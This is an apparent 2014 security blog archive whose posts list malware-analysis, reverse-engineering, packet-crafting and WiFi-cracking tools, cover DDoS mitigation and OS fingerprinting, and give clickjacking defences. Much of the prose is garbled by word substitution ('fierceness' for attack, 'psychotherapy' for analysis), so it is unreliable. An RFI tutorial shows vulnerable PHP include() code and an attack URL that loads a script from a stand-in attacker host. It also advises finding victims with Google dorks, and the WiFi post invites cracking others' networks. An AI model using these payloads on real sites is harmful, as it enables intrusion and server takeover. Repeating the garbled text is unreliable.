Sunday 30 November 2014

Best Tools for static mobile malware analysis

 Best Tools for static mobile malware analysis

Day by day the number of smartphone users is increasing shortly, along behind smartphone usage mobile malware attacks are as well as growing. Malware is malicious software used to disrupt, assemble information, or reach entrance to a computer system or mobile device. Malware developers create use of thirdparty application to inject malicious content into smartphone and compromise phone security. Malware detectors are the primary tools to accomplishment against these malwares. The attainment of malware detectors are based as regards techniques it uses. this article focues upon the tools that we can use even if doing static malware analysis.

Santoku is dedicated to mobile forensics, analysis, and security, and packaged in an handy, Open Source platform. Santoku have everithing in to gone it comes out cold analysing Mobile Malware Analysis.It contains:
    Mobile device emulators
    Utilities to simulate network services for full of beans analysis
    Decompilation and disassembly tools
    Access to malware databases
The Mobile-Sandbox provides static and lively malware analysis collective following than robot learning techniques for Android applications
smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based upon Jasmin's/dedexer's syntax, and supports the full functionality of the dex format (annotations, debug info, pedigree info, etc.)
Androguard is mainly a tool written in python to perform as soon as :
    Dex/Odex (Dalvik virtual machine) (.dex) (disassemble, decompilation),
    APK (Android application) (.apk),
    Android's binary xml (.xml),
    Android Resources (.arsc).
apkinspector
The direct of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code. APKInspector provides both analysis functions and graphic features for the users to make a obtain of deep rapidity into the malicious apps:
  •     CFG
  •     Call Graph
  •     Static Instrumentation
  •     Permission Analysis
  •     Dalvik codes
  •     Smali codes
  •     Java codes
  •     APK Information
The IDA Disassembler and Debugger is an interactive, programmable, extendible, multi-processor disassembler hosted upon Windows, Linux, or Mac OS X. IDA has become the de-facto okay for the analysis of hostile code, vulnerability research and COTS validation.
dex2jar contains following compment
  • dex-reader is expected to access the Dalvik Executable (.dex/.odex) format. It has a spacious weight API same as soon as ASM. An example here
  • dex-translator is intended to obtain the convert job. It reads the dex auspices to dex-ir format, after some optimize, convert to ASM format.
  •  dex-ir used by dex-translator, is meant to represent the dex inform
  •  dex-tools tools to produce a upshot as soon as .class files. here are examples:
  •   Modify a apk
  •   DeObfuscate a jar
  •   d2j-smalidisassemble dex to smali files and build up dex from smali files. vary implementation to smali/baksmali, linked syntax, but we withhold control away in type desc "Lcom/dex2jar\t\u1234;"
  •  dex-writer  write dex thesame quirk as dex-reader.
JD-GUI is a standalone graphical abet that displays Java source codes of .class files. You can browse the reconstructed source code later the JD-GUI for instant entry to methods and fields.

Friday 28 November 2014

Best tools for Malware Analysis

Best tools for Malware Analysis

Malware is coined from the two words malicious and software. Malware refers to Spyware, Trojans, Bots, Viruses, Hijackers and auxiliary pieces of software considering malicious intent.A list of malware analysis tools intended to log the behavior of a process, log its network traffic, access to the registry etc. Mobile malware analysis tools are included together behind than useful sandboxing software for nimble analysis.
VirusTotal is a forgive advance that analyzes suspicious files and URLs and facilitates the fast detection of viruses, worms, trojans, and all kinds of malware.
SysAnalyzer is an automated malcode warn era analysis application that monitors various aspects of system and process states. SysAnalyzer was expected to enable analysts to rapidly construct a sum relation as to the activities a binary takes on a system. SysAnalyzer can automatically monitor and compare:
* Running Processes
* Open Ports
* Loaded Drivers
* Injected Libraries
* Key Registry Changes
* APIs called by a twist process
* File Modifications
* HTTP, IRC, and DNS traffic
www.robtex.com
In the https://www.robtex.com/ you can search for:
DNS checks detailed dns hint for a hostname
IP-number checks ip number hint such as dns reverse and forwards
route checks a specific routed prefix
AS numbers checks warn very roughly an AS-number
AS macros checks who belongs to an AS-macro
MalZilla
Web pages that contain exploits often use a series of redirects and obfuscated code to make it more hard for somebody to follow. MalZilla is a useful program for use in exploring malicious pages. It allows you to pick your own fan agent and referrer, and has the fighting to use proxies. It shows you the full source of webpages and all the HTTP headers. It gives you various decoders to attempt and deobfuscate javascript aswell.
Regshot is a little, discharge and ensnare-source registry compare serve that allows you to hurriedly believe a snapshot of your registry and also compare it once a second one - finished after disturbance an combat-stroke system changes or installing a additional software product. The changes savings account can be produced in text or HTML format and contains a list of all modifications that have taken place surrounded by the two snapshots. In tallying, you can along with specify folders (gone subfolders) to be scanned for changes as adroitly.
Wireshark the best network traffic analyzer in my insinuation. Malicious programs on the subject of always cause some sort of network traffic and you nonappearance to be adept to decode what this traffic is. It might be a password live thing sent to an IRC server to colleague a channel, it might even be that text file you stored upon your desktop as passwords.txt. Have your network analyzer setup to the lead you manage the malicious code that exaggeration you wont miss a single packet.
The Volatility Framework is a deeply twist accretion of tools, implemented in Python under the GNU General Public License (GPL v2), for the lineage of digital artifacts from volatile memory (RAM) samples. The stock techniques are performed terribly independent of the system mammal investigated but designate unprecedented visibility into the runtime make a clean breast of the system

Thursday 27 November 2014

Best Tools for Reverse Engineering Part 2

Best Tools for Reverse Engineering Part 2

Reverse engineering is the process of analyzing a subject system to identify the system's components and their dealings, and to make representations of the system in choice form or at a to the front-thinking level of confiscation. The process of reverse engineering, which is portion of malware analysis, is clever using specific tools that are categorized as hex editors, disassemblers/debuggers, decompiles and monitoring tools. Remaning tools for Reverse Engineering are as follow:
Hiew is a popular console hex editor for Windows written by Eugene Suslikov (sen). Amongst its feature set is its triumph to view files in text, hex and disassembly mode. The program is particularly useful for editing executable files such as COFF, PE or ELF executable files.
Features
Hiew's features insert:
    Built-in x86, x86-64 and ARMv6 assembler and disassembler.
    Pattern searching in disassembler mode.
    Support for NE, LE, LX, PE and tiny-endian ELF executable formats.
    Built-in 64-bit calculator.
    Supports files of arbitrary length.
The Netwide Assembler (NASM) is an assembler and disassembler for the Intel x86 architecture. It can be used to write 16-bit, 32-bit (IA-32) and 64-bit (x86-64) programs. NASM is considered to be one of the most popular assemblers for Linux.
NASM was originally written by Simon Tatham when reference from Julian Hall and is currently maintained by a small team led by H. Peter Anvin.[2] It is straightforward as pardon software out cold the terms of the simplified (2-clause) BSD license.
Wireshark is the world's foremost network protocol analyzer. It lets you see what's up as regards your network at a microscopic level. It is the de facto (and often de jure) taking place to okay across many industries and moot institutions.
Features
Wireshark has a rich feature set which includes the considering:
  •     Deep inspection of hundreds of protocols, yet again sentient thing supplementary every one single one the epoch
  •     Live take possession of and offline analysis
  •     Standard three-pane packet browser
  •     Multi-platform: Runs not far-off away off from Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
  •     Captured network data can be browsed via a GUI, or via the TTY-mode TShark promote
  •     The most powerful display filters in the industry
  •     Rich VoIP analysis
  •     Read/write many every substitute capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer (compressed and uncompressed), Sniffer Pro, and NetXray, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
  •     Capture files compressed as soon as gzip can be decompressed vis--vis speaking the fly
  •     Live data can be admission from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending regarding your platform)
PE Tools
A stockpile of tools for your daily PE interactions: editors, analyzers, rebuild and resource extractors.
 PE Editors
    Cerbero PE Insider
    Explorer Suite III Multi-Platform Version
    Explorer Suite III Stand-alone Version
    PE Editor in the past retain for: PE32, PE64, .NET, and process monitor/dumper
    Lord PE 1.41 Deluxe b
    PE Editing suite
    ProcDump v1.6.2
    Unpacker, Decryptor, PE Editor
    PeStudio 8.42
    PeStudio is a unique tool that performs the static psychotherapy of 32-bit and 64-bit executable
PE Analyzers
    Crypto Searcher
    Crypto has hundreds of signatures used to detect crypto algos used in a program
    Detect it Easy 0.64
    Another one PE identifier.
    PEiD 0.95
PE Identifier, in the air of many enthralling plugins [ Include a functioning in progress userdb.txt; last update 25/06/2009 ]
    PROTECTiON iD 0.6.6.6 October
    The ultimate Game Protection Scanner
    RDG Packer Detector 0.7.3
    PE identifier, often bigger than PeId
    Stud PE v. 2.6.1.0
    Another PE identifier
PE Rebuilders
    Import Recostructor 1.7 FINAL
    Useful for rebuilding the IT of PE executable (PE+ not supported)
    CHimpREC 1.0.0.1
    Rebuilder for PE/PE+ executable
    PE Tools 1.5.800.2006 RC7
    Editor PE of files, Task Viewer, Win32 PE files optimizer, detector of compiler/packer and many auxiliary things
    Relox 1.0a
    Useful for rebuilding the Reloc table of an unpacked dll

Wednesday 26 November 2014

Best Tools for Reverse Engineering Part 1

Best Tools for Reverse Engineering Part 1

Reverse Engineering is the decompilation of any application, regardless of the programming language that was used to make it, for that excuse that one can profit its source code or any part of it.The reverse engineer can re-use this code in his own programs or change an existing (already compiled) program to produce a result-accomplishment in subsidiary ways.
There are a lot of good and bad tools that are available for free just like there are good and bad tools that you must pay for. In the world of reverse engineering programs on the computer there are plenty of free tools that are considered at the top of the field. In this article I will take a look at a few of them now. article I will believe a see at a few of them now.

Debuggers

The debugger is the most important portion taking into consideration reverse engineering an executable. There are various debuggers we can choose from, but the best of them are the in the space of:
GDB : GDB, the GNU Project debugger, allows you to see what is going vis--vis speaking inside' irregular program even though it executes or what option program was progress at the moment it crashed.

GDB can realize four main kinds of things (gain new things in retain of these) to support you catch bugs in the battle:
  •     Start your program, specifying everything that might play its tricks.
  •     Make your program cumulative less not quite specified conditions.
  •     Examine what has happened, subsequent to your program has stopped.
  •     Change things in your program, suitably you can experiment in the middle of correcting the effects of one bug and go taking into account quotation to to learn virtually option.
Ollydbg:The adjacent tool that I am going to manner at is known as Ollydbg. This software is for x86 based systems and it allows you to reverse engineer any program re speaking that platform.  You can profit an accurate idea upon how the program flows through your computer by meting out and stopping the software in Ollydbg.  You can plus check the states of the registers of the CPU and in the memory though the program operates. OllyDBg is known as the beginners tool to reverse engineering but in realism it is much substitute than that. With this software you are skillful to be alert most all that paid for software such as IDA Pro can glamor off. While IDA Pro does money your hand a little bit more OllyDBG is usual for most instances. So if you are looking for reverse engineering software that is light plus check this one out first.
Windbg:WinDbg is a multipurpose debugger for Microsoft Windows, distributed upon the web by Microsoft. It can be used to debug fan mode applications, drivers, and the in force system itself in kernel mode. It is a GUI application, but it has little in common taking into account the augmented known, but less powerful, Visual Studio Debugger.

WinDbg can be used for debugging kernel-mode memory dumps, created after what is commonly called the Blue Screen of Death which occurs gone a bug check is issued. It can in addition to be used to debug enthusiast-mode be in pain dumps. This is known as growth-mortem debugging.
Immunity Debugger:Immunity Debugger is a powerful growth showing off to write exploits, analyze malware, and reverse engineer binary files. It builds upon a hermetic user interface gone have emotional impact an encounter graphing, the industry's first deposit analysis tool built specifically for amassing opening, and a large and ably supported Python API for drifting extensibility.
  • A debugger behind functionality meant specifically for the security industry
  • Cuts shout insults proceed period by 50%
  • Simple, manageable interfaces
  • Robust and powerful scripting language for automating proficient debugging
  • Lightweight and hasty debugging to prevent ruination during perplexing analysis
  • Connectivity to fuzzers and mistreat press before tools
Ida Pro:The Interactive Disassembler, more commonly known as consequently IDA, is a disassembler for computer software which generates assembly language source code from machine-executable code. It supports a variety of executable formats for choice processors and in force systems. It with can be used as a debugger for Windows PE, Mac OS X Mach-O, and Linux ELF executables. A decompiler plug-in for programs compiled as soon as than a C/C++ compiler is easy to reach to at subsidiary cost. 
IDA performs automatic code analysis, using livid-references in the midst of code sections, knowledge of parameters of API calls, and new recommendation. However, the natural world of disassembly precludes quantity correctness, and a pleasant bargain of human group is necessarily required; IDA has interactive functionality to aid in improving the disassembly. A typical IDA user will begin back an automatically generated disassembly listing and later convert sections from code to data and vice versa, rename, annotate, and otherwise merge information to the listing, until it becomes hermetic what it does.
Renaming tools for Reverse Engineering are in the next part of the article.

Tuesday 25 November 2014

Mitigation and prevention from DDOS

Mitigation and prevention from DDOS

There is no unlimited or obtain truthful to DDoS. The logic is easy: NO software or countermeasures can stand going on to attacks from, proclaim, 100 servers at gone. All that can be done is to believe preventive events, and confession speedily and effectively taking into consideration the injury takes place.
As it is often said, an ounce of prevention is improved than a pound of cure - and this is no consider real in the conflict of DDoS. In the beginning, I had mentioned that DDoS often happens because of vulnerable software/applications handing out on the order of a robot in a particular network. Attackers use those security holes to compromise the hosts and the servers and install the DDoS tools such as 'trin00'.
  •    Create and espouse a satisfying security policy
  •    Set going on a firewall which does ingress and egress filtering at the gateway
  •    Use host-based intrusion detection moreover mention to your gateway/hosts to nimble you to harbor scans and crack-in attempts
To prevent your network from living thing used as a slave, follow these steps:
  •     Conduct regular audits going something subsequent to the order of for each host concerning the network to believe to be installed DDoS tools and vulnerable applications.
  •     Use tools gone Rkdet, Rootkit Hunter, or chkrootkit to believe to be if a rootkit has been installed once suggestion to the order of your system.
  •     Perform a general security audit coarsely your systems upon a regular basis:
  •         Keep your systems happening to date to minimize software vulnerabilities (kernel and software upgrades)
  •         Check for rootkits
  •         Check logs for evidence of port sniffing, etc.
  •         Check for hidden processes by comparing the output of 'ps' and 'lsof'.
  •         Use auditing tools (i.e., Nessus, SAINT, or SARA)
  •         Check system binaries considering, e.g., Tripwire to see if they've been distorted by now your last snapshot
  •         Check for right of access email relays
  •         Check for malicious cron entries
  •         Check /dev /tmp /var directories for strange files (i.e., '...', muddled permissions/ownership upon device files, etc.)
  •         Check whether backups are maintained
  •         Check for unwanted users and groups (inspect /etc/passwd)
  •         Check for and disable any unneeded facilities
  •         Check for SUID, SGID, and 'nouser' files upon your system considering the 'find' command
  •         Check the system law (memory and CPU usage); note the average levels
  •     Create a DSE (Dedicated Security Expert) team for your company.
  •     Enforce and take taking place security proceedings upon all hosts in the network. The unaccompanied hosts that should be allowed upon your network are ones that have been vetted by your security dispensation or DSE (Dedicated Security Expert). All hosts upon the network should be checked upon a regular basis by your DSE team.
  •     Collect your network and host data and analyze them to see what suitable of attacks are creature have the funds for an opinion contiguously your networks.

Sunday 23 November 2014

Overview of OS Fingerprinting

Overview of OS Fingerprinting

Operating System fingerprinting is the process of learning what operating system is running on a particular device.By analyzing certain protocol flags, options, and data in the packets a device sends onto the network, we can make relatively accurate guesses about the OS that sent those packets.By pinpointing the exact OS of a host, an attacker can launch a precise attack against a target machine. In a world of buffer overflows, knowing the exact flavour of an OS and architecture could be all the opportunity an attacker needs 

Why OS Fingerprinting?
Learning remote OS versions can be an extremely valuable network reconnaissance tool, since many security holes are dependent on OS version. As long as this information is not revealed, the attacker is limited in the variety of attacks and exploits. Therefore the focus on initial information gathering is finding out the operating system.
For example without OS fingerprinting a attacker is unable to know whether the target have IIS server or apache server and it’s pointless to try IIS exploits on an Apache server.
TCP and ICMP fingerprinting
OS scanning works with the TCP/IP suite of protocols. TCP/IP is the protocol that the internet relies heavily on. All the communication on the internet is done using this protocol suite. This makes it very much necessary for an operating system to implement it, for communication with other machines flawlessly. IP is used to assign logical address to machines on the network, and TCP is used to transfer IP packets in an acknowledged fashion. These flags are essential for OS fingerprinting since each operating system reacts differently to normal and special crafted TCP packets sent to its network stack. 

TTL (Time to live) is a value set by the computer or the device that sends an IP packet, every router that comes in between the packet and its destination will reduce the value by 1. So if a packet has travelled too long, overcoming too many hops (router machine's in between), and the TTL value becomes zero (because it got reduced by 1 at all hops in between), then that packet is discarded.
Another protocol often used in fingerprinting is the Internet Control Message Protocol. Most traceroute utilities use ICMP to discover the network path a packet takes to its destination. ICMP also returns error messages when a datagram is not processed correctly, whether due to the device not being active on the network or a problem with the datagram itself. These error messages can also be useful. 

The header looks different for each request and reply packet though. 

Types of OS Fingerprinting
Active fingerprinting is the process of transmitting packets to a remote host and analysing corresponding replies. This allows the scanner to obtain more accurate results than a passive scanner and in a shorter amount of time. The traditional approach is to examine the TCP/IP stack behaviour of a targeted network element when probed with several legitimate packets.
  • Nmap
First step of network recon is to determine what machines are active on the network. One popular tool that employs such OS detection methods is Nmap which not only allows you to detect the operating system running on a remote system, but also perform various types of port-scans.
Nmap OS fingerprinting works on the concept of sending multiple UDP and TCP packets to the target hosts, and then analyzing the reply. During the OS scan using Nmap tool, the tool will send requests to both open and closed ports to analyze the reply method. This option tells Nmap not to do a port scan after host discovery, and only print out the available hosts that responded to the scan. This is often known as a “ping scan”. It allows light reconnaissance of a target network without attracting much attention. Knowing how many hosts are up is more valuable to attackers than the list provided by list scan of every single IP and host name. 

Attempting to detect an operating system with Nmap is as simple as running it with the -O switch. Here is the result of scanning windows machine. 

Below is the result of scanning Linux machine. 

  • Xprobe2
You can detect the remote operating system, by also using xprobe2.The purpose of the tool is to perform fingerprinting of remote TCP/IP stacks based on Ofir Arkin's ICMP fingerprinting research. Xprobe2 is an active operating system fingerprinting tool with a different approach to operating system fingerprinting. Xprobe2 rely on fuzzy signature matching, probabilistic guesses and multiple simultaneously matches and a signature database.
TCP scans are pretty easy to detect for IDS systems. Hence using only the ICMP modules available in xprobe2 is pretty nice for remaining stealth.
Currently, xprobe2 has the following modules:
o icmp_ping: ICMP echo discovery module
o tcp_ping: TCP-based ping discovery module
o udp_ping: UDP-based ping discovery module
o ttl_calc: TCP and UDP based TTL distance calculation
o portscan: TCP and UDP PortScanner
o icmp_echo: ICMP echo request fingerprinting module
o icmp_tstamp: ICMP timestamp request fingerprinting module
o icmp_amask: ICMP address mask request fingerprinting module
o icmp_port_unreach: ICMP port unreachable fingerprinting module
o tcp_hshake: TCP Handshake fingerprinting module
o tcp_rst: TCP RST fingerprinting module
o smb: SMB fingerprinting module
o snmp: SNMPv2c fingerprinting module
For fingerprinting a remote machine, you can just call xprobe2 and give the remote machine IP address or hostname. 

Passive fingerprinting is the process of analysing packets from a host on a network. In this case, finger printer acts as a sniffer and doesn't put any traffic on a network. It is called passive because it doesn’t involve communicating with the host being examined. Based on the sniffer traces of these packets, you can determine the operating system of the remote host. Passive scanners are generally and inherently less accurate than active scanners, due to the fact they have less control over the data they are analyzing.
  • NetworkMiner
NetworkMiner is a network forensic analysis tool. NetworkMiner can be used as a passive network sniffer and packet capturing tool in order to detect operating systems, sessions, hostnames, open ports, etc, without putting any traffic on the network.
For OS fingerprinting we have to run NetworkMiner and select the network interface for which the data has to be captured. We can sort hosts by IP address, MAC address, hostname, Operating System etc. And then click start. 

NetworkMiner displays the identified OS for each host in the “Hosts” tab by showing an icon for the OS next to the host in the tree-view. Each host can also be expanded, which enables the user to see a more detailed analysis of the matching OS fingerprints for that particular host.
OS detection could be performed simply by using a ping and determining the OS of the destination host based off the TTL value returned with the ping response. 

Above are the values for the more popular operating systems.
Result of scanning Linux machine. 

From the below shown example of ping you can easily see the TTL value, its 128. That's the default TTL value for Windows.

Prevention
It is nearly impossible to block all fingerprinting attacks, but we can make it difficult by using several measures. We have to make sure that external hosts are not able to directly scan internal targets. Active OS fingerprinting can also be solved by use of a firewalls, Intrusion Prevention System. Banner grabbing should be a bit easier to defend against. The Apache config file allows you to limit the information listed in the header. If we have some service running and there's an open port, mask or delete the server information when an error triggered.
Conclusion
OS Fingerprinting is a very valuable technique to find out the OS. From an attacker's point of view, OS fingerprinting is very helpful in figuring out what vulnerabilities the system might have or which exploits may work on a system. There are lot of techniques to do OS fingerprinting, at the same time there are number of ways to overcome and avoid OS finger printing.

Thursday 20 November 2014

Test your firewall by Packet Crafting

Test your firewall by Packet Crafting

Packet crafting is the technique through which an attacker finds vulnerabilities or handy points within your firewall. This is ended by manually generating packets to test network devices and behaviour, otherwise of using existing network traffic. Testing may plan the firewall, IDS, TCP/IP stack, router or any new component of the network. Packets are usually created by using a packet generator or packet analyzer which allows for specific options and flags to be set as regards the created packets.
 These tools help you achieve that more easily. Below are the tools that you can use to test your firewall.


Hping
hping is a command-extraction oriented TCP/IP packet assembler
Uses for hping:
  1. TCP, UDP, ICMP Header maltreatment
  2. Testing firewall and IDS rules
  3. Recreating traffic traces
  4. Network and TCP/IP implementation psychiatry
Scapy
Interactive packet pronounce-calling tool. Scapy is a powerful interactive packet exploitation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively make packets or sets of packets, misuse them, send them again the wire, sniff accessory packets from the wire, be of the same opinion answers and replies, and more. Interaction is provided by the Python interpreter, consequently Python programming structures can be used (such as variables, loops, and functions). Report modules are realistic and easily reached to make.

Nemesis
Nemesis is a command-extraction UNIX network packet injection suite.Nemesis is a unconditionally powerful suite of packet crafting tools.Nemesis is a suite of packet crafting tools for the subsequent to than protocols: arp, dns, ethernet, icmp, igmp, ip, ospf, rip, tcp, and udp.Nemesis can be used for a broad range of packet crafting goals, from  IDS and firewall scrutiny, to recreating traffic, to scanning for stir hosts using a variety of vary tools. Like hping2, the knack of nemesis live thing a Unix command lineage tool, allows the addict delightful general pardon in shell scripting anything test they goal to manage

Yersinia
Yersinia is a low-level protocol fierceness tool useful for shrewdness investigation. It is talented of many diverse attacks greater than multiple protocols, such as becoming the root role in the Spanning Tree (Spanning Tree Protocol), creating virtual CDP (Cisco Discovery Protocol) neighbors, becoming the responsive router in a HSRP (Hot Standby Router Protocol) scenario, faking DHCP replies, and choice low-level attacks.
Netcat
Netcat is a drifting Unix promote which reads and writes data across network connections, using TCP or UDP protocol. It is expected to be a honorable "before now-halt" tool that can be used directly or easily driven by choice programs and scripts.

Remote file inclusion (RFI) tutorial

Remote file inclusion (RFI) tutorial

RFI is an anomalous form of web fierceness where the invader can inject their own scripts and kill it approaching the web server. I subsequent to to call RFI the gaining of unpredictable and uncontrollable code.

Im pardon many of you who are reading this have attempted RFI and probably are saw that its a easily reached method of ferociousness. But sick bet that not many know what occurs subsequent to the scene, how it works, and why it works. Today in poor health intensify that.


First of all we have to find the website that gets his pages using the PHP include() function and vulnerable to RFI (Remote File Inclusion). The best technique is to find websites using Google Dorks. Google dorks are simply the queries that are used to identify the specific search results.

 I have already listed a lot off Google Dorks in my previous post. You can Download the list of Dorks for RFI from here.

So how does RFI take steps?
To know how RFI works, you compulsion to have a in try of fact basic pure family of PHP. Its not in intention of fact hard to resign yourself to, but for those who realize not getting merger of PHP at all, in poor health be explaining the code.

Lets statement you have a site that is vulnerable to RFI, and its displaying the main page of the site as index.html. This is how the PHP could be scripted coarsely the vulnerable site.

PHP Code:
<?php
  $file =$_GET['index']; //The page we hope to display
  have an effect on in front($file);
?>

Code Examination:
Ok for those who dont know PHP, tolerate me manage by the code, for those who know it, disquiet uphill right along :)

$ is used to believe to be a adaptable and later you find the child support for it a value considering the = sign. Then its using the GET parameter to fetch the index.html. Then lastly, the ornament($file) straightforwardly tells the server to adjoin the changeable $file in this area the order of the page around which is coded. So if you put this PHP code upon the tummy page of the site, it will insert the index.html and thats why you can see the index of the site.

The URL of the site looking along with this:
http://www.site.com/index.php?page=index.html

Well knowing this, an attacker can manipulation the site using RFI once so:
http://www.site.com/index.php?page=http://www.attackersserver.com/my_evil_script.txt?

Before the whole, take on me interpret what happens upon the coding side.

PHP Code:
<?php
  $file ="http://www.attackersserver.com/my_evil_script.txt?"; //$_GET['index'];
  include($file); //$file is the script the attacker is including.
?>

As you can see, our regulating $file is no longer fetching the index.html, its including the script the invader has included from a detached server, suitably the reveal. Why does this be in? handily because of the include() do something that lets you partner files remotely.

As you can heavens the attacker has included a .txt file and not .php. Well why is that? The defense for this is because if the invader would have put .php and had PHP installed, the script will slay upon his server and not the targets.

Also, you noticed that we added a ?, the gloss we did this is because it removes anything that could society the  include()  function.

Take this code for example:

PHP Code:
<?php
  $file =$_GET['index'];
  include($file .".php");
?>

As you can see, there's anew just the modifiable $file in it, and that could late buildup an shape. The above script adds .php to any file that's mammal included. So if we included http://www.attackersserver.com/my_evil_script.txt without the ?, we are in reality going to see http://www.attackersserver.com/my_evil_script.txt.php because of what's inside of the add  include()  skirmish, which is BAD. So in order to make unconditional nothing is inside the  include()  take movement, we be credited behind the ?

Wednesday 19 November 2014

Tools to hack WiFi

Tools  to hack WiFi

Cracking of wireless networks is the defeating of security devices in Wireless local-place networks. Wireless local-area networks(WLANs)  in addition to known as Wi-Fi networks are inherently vulnerable to security lapses that wired networks are exempt from.Cracking is a nice of recommendation network violent behavior that is akin to a focus on intrusion. There are two basic types of vulnerabilities similar taking into consideration WLANs: those caused by needy configuration and those caused by weak encryption.
Would you considering to acquire entry to the Internet using a wireless network, but they are password protected? Do not hurry to profit disaster, because asleep are the tools that we can use to hack WiFi.

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works following any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. It implements the comfortable FMS ferociousness along following than some optimizations in the back KoreK attacks, as skillfully as the PTW attack, so making the injury much faster compared to take before WEP cracking tools.

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will action behind any wireless card which supports raw monitoring (rfmon) mode, and (when take control of hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet plus supports plugins which divulge sniffing postscript media such as DECT. Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs.

NetStumbler (a.k.a. Network Stumbler) is a tool for Windows that facilitates detection of Wireless LANs using the 802.11b, 802.11a and 802.11g WLAN standards. It runs on the subject of the subject of Microsoft Windows involved systems from Windows 2000 to Windows XP. A trimmed-down report called MiniStumbler is easy to attain to for the handheld Windows CE in force system.

The program is commonly used for:
    Wardriving
    Verifying network configurations
    Finding locations when poor coverage in a WLAN
    Detecting causes of wireless interference
    Detecting unauthorized ("rogue") access points
    Aiming directional antennas for long-haul WLAN unite

inSSIDer is a Wi-Fi network scanner application for Microsoft Windows and Apple OS X developed by MetaGeek, LLC.
Features
    Gathers make aware from wireless card and software
    Helps pick the best wireless channel easy to use
  Wi-Fi network recommendation such as SSID, MAC, vendor, data rate, signal strength, and security
    Graphs signal strength far-off ahead than time
    Shows which Wi-Fi network channels overlap
    GPS maintain
    Export to Netstumbler (.ns1) files
    KML logging

KisMAC is a wireless network discovery tool for Mac OS X. It has a broad range of features, same to those of Kismet (its Linux/BSD namesake). The program is geared toward network security professionals, and is not as novice-nice as same applications. Distributed under the GNU General Public License, KisMAC is manageable software.KisMAC will scan for networks passively harshly supported cards - including Apple's AirPort, and AirPort Extreme, and many third-party cards, and actively in checking account to any card supported by Mac OS X itself.
Fern Wifi Cracker is a Wireless security auditing and violence software program written using the Python Programming Language and the Python Qt GUI library, the program is skillful to niche and recover WEP/WPA/WPS keys and as well as run in front payment network based attacks upon wireless or ethernet based networks

Reaver implements a being force violent behavior neighboring-door to Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.Reaver has been intended to be a robust and practical violent behavior adjoining WPS, and has been tested behind-door-door to a broad variety of access points and WPS implementations.

Remote file inclusion (RFI) dork list

Remote file inclusion (RFI) dork list

RFI is one of the popular Web hacking method used by the Hackers in todays world. Remote File Inclusion occurs taking into consideration than a unfriendly file, usually a shell (a graphical interface for browsing standoffish files and running your own code concerning a server), is included into a website which allows the hacker to slay server side commands as the current logged regarding user, and have entrance to files upon the server. With this adroitness the hacker can continue upon to use local exploits to escalate his privileges and let on extremity of the amass system.
Many servers are vulnerable to this fresh of violent behavior because of PHPs default settings of register_globals and allow_url_fopen creature enabled. Although as of PHP 6.0, register_globals has been depreciated and removed, many websites yet rely upon older versions of PHP to control their web applications.

First of all we have to locate the website that gets his pages using the PHP include() discharge duty and vulnerable to RFI (Remote File Inclusion). The best technique is to locate websites using Google Dorks. Google dorks are handily the queries that are used to identify the specific search results.You can download the Google dorks list of RFI from the link given below..

Click Jacking

                                                                     

Click Jacking

This attack also known as "UI redress attack", is when an attacker uses multiple transpar layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.

Impacts of Click Jacking
  • Naive Users can be tricked in performing actions such as such as orders, change settings,   adding/deleting/modifying data withouttheir knowledge
  • Frequenty attack  used on social network websites like Facebook and twitter, Because this attack is used by convinced victim for click on the link and SocialNetwork website might be very useful for attack on victim
Prevention of Click Jacking
There are two main ways to prevent clickjacking:
1:Sending the proper X-Frame-Options HTTP response headers that instruct the browser to not allow framing from other domains
2:Employing defensive code in the UI to ensure that the current frame is the most top level window
X Frame Options (Add the Xframe options in all parts of applications) Code Snippet( Xframe Options in Http Headers)
In Java
 // to prevent all framing of this content
 response.addHeader( "X-FRAME-OPTIONS", "DENY" );
 // to allow framing of this content only by this site
 response.addHeader( "X-FRAME-OPTIONS", "SAMEORIGIN" );

In Php
<?php
header("X-Frame-Options: SAMEORIGIN");
?>

In .Net

In Application_BeginRequest method of global.asax file
void Application_BeginRequest(object sender, EventArgs e)
{
    HttpContext.Current.Response.AddHeader("x-frame-options",

"DENY");
}

2:Frame Busting Code

Works in all cases

<style id="antiClickjack">body{display:none !important;}</style>
<script type="text/javascript">
   if (self === top) {
       var antiClickjack = document.getElementById

("antiClickjack");
       antiClickjack.parentNode.removeChild(antiClickjack);
   } else {
       top.location = self.location;
   }
</script>


Simple Test to Check for ClickJacking for Application

<HTML>
<BODY>
<H1>Clickjacking Test</H1>
<IFRAME SRC="Url of Target website" HEIGHT="700"

WIDTH="700"></IFRAME>
</BODY>
</HTML>

Tuesday 18 November 2014

Internet Forensics Resources

Internet Forensics Resources

Internet Forensics
The testing of criminal to-do that has occurred a propos the Internet. It deals subsequent to the analysis of the origins, contents, patterns and transmission paths of e-mail and Web pages as swiftly as browser records and Web server scripts and header messages.

Deep People Search Engines - Here I pay for you then a list that you can use to locate out more counsel just virtually speaking someone via these deep people search engines by entering their adherent-names, valid names, email addresses and therefore something bearing in mind:
    Pipl
    PeekYou
    Spokeo
    Zaba Search
    Lullar
    123 People
    Bizavo
    CVGADGET
    ZoomInfo
    192
Public Records Searches - Here I present you taking into account resources which you can use to locate out recommendation vis--vis people taking into account whether or not they have a criminal sticker album, Registered upon any offenders list, Missing people archives, Birth history License Plate history etc.:
    Free Public Records
    International Court Case Records
